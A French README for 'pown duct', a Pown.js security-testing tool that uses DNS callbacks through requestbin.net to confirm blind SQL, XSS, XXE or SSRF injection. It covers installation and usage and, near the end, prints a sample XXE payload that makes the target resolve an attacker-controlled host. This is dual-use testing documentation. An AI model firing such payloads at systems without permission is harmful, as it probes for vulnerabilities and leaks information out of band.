
Outil essentiel pour trouver les attaques par injection aveugle.
Outil essentiel pour trouver des attaques par injection aveugle via des canaux latéraux DNS.
Cet outil fait partie de l'initiative open-source de secapps.com.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB : Cet outil utilise le service http://requestbin.net. Les futures versions utiliseront une infrastructure dédiée et faite sur mesure.
Cet outil est destiné à être utilisé dans le cadre de Pown.js, mais il peut être invoqué séparément en tant qu'outil indépendant.
Installez d'abord Pown comme d'habitude :
$ npm install -g pown@latest
Invoquez directement depuis Pown :
$ pown duct
Sinon, installez ce module localement depuis la racine de votre projet :
$ npm install @pown/duct --save
Une fois cela fait, invoquez pown cli :
$ ./node_modules/.bin/pown-cli duct
Vous pouvez également utiliser le pown global pour invoquer l'outil localement :
$ POWN_ROOT=. pown duct
pown duct <command>
Side-channel attack enabler
Commands:
pown duct dns DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]
Il existe des cas où nous devons effectuer une attaque telle qu'une injection SQL, XSS, XXE ou SSRF, mais l'application cible ne fournit aucune indication qu'elle est vulnérable. Une façon d'être sûr qu'une vulnérabilité est présente est d'essayer d'injecter un vecteur d'attaque valide qui force un résolveur DNS à interroger un domaine contrôlé. Si la résolution réussit, l'attaque sera considérée comme réussie.
NOTE : Vous connaissez peut-être Burp Collaborator qui fournit un service similaire à ses clients.
Tout d'abord, nous avons besoin d'un nom DNS jetable à résoudre :
$ pown duct dns
capture d'écran
En utilisant le DNS fourni, composez votre charge utile. Par exemple, ce qui suit pourrait déclencher une résolution DNS si une vulnérabilité XXE est présente.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
Si l'attaque a réussi, nous recevrons un message dans le terminal.
capture d'écran